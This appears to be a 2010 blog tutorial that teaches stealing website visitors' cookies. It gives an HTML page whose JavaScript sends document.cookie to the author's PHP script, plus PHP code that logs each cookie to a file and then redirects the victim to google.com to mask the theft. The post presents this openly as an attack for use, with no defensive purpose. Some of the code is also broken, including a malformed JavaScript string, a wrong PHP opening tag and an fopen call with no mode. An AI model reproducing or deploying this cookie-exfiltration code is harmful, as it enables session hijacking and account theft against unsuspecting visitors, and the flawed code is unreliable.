July 08, 2010Write comment

Stealing visitor’s cookies with PHP and JavaScript

Yes, you read well: we’re talking about getting a visitor’s cookies through PHP and JavaScript.
Obviously that person must visit a particular page on our website, which will be appositely created to look harmless and perfectly safe to browse.

We”re going to try getting cookies using a really simple PHP script and a bit of JavaScript to create the dynamic URL we need.
The JavaScript code is what actually gets the cookie content while the PHP part is used to save the received data to a file, located on our Hard Drive.

The entire script will pass data through GET variables.

The HTML page

We need a normal HTML page to put a JavaScript snippet in; so create a page called foo.html and, just under the <body> tag insert the following code

<script>
    window.location=""http://yoursite.com/getcookie.php?data=" . document.cookie
</script>

Once the user loads the page, he”s immediately redirected to getcookie.php with a variable (data) containing the cookie content.

The PHP page will the save it into a file (which you can open and read its content) and redirects to another page.

Getting the cookie

Here is the script core, which actually does the trick and makes the whole system work.

<php
// Get what comes after the word 'data' in the URL
$data = $_GET['data'];

// Create a new file called 'cookie_1234567.txt' and opens it
// The numbers changes each time the function is called, since it
// represents the UNIX timestamp of the exact moment the function 'time()'
// is called
$file = fopen ("cookie_" . time() . ".txt");

// Writes $data to the $file
fwrite ($file, $data);

// Closes handle
fclose ($file);

// If you want to print results here, uncomment the following line
// and remove 'header (...)'// Redirects to another page
header ("Location: http://google.com");
?>

Wow, try it to check if it works. It should create the file cookie_[timestamp].txt and redirect you to google.com or just output the data, as you decided.

See also

Filed under Programming (, , , )
Post a comment and tell the world what you think of this super awesome page!

  1. No comments yet.

  1. No trackbacks yet.

Parents told me to avoid people I don't know.
No spam, I promise. And not published either!
Free do-follow link to your website.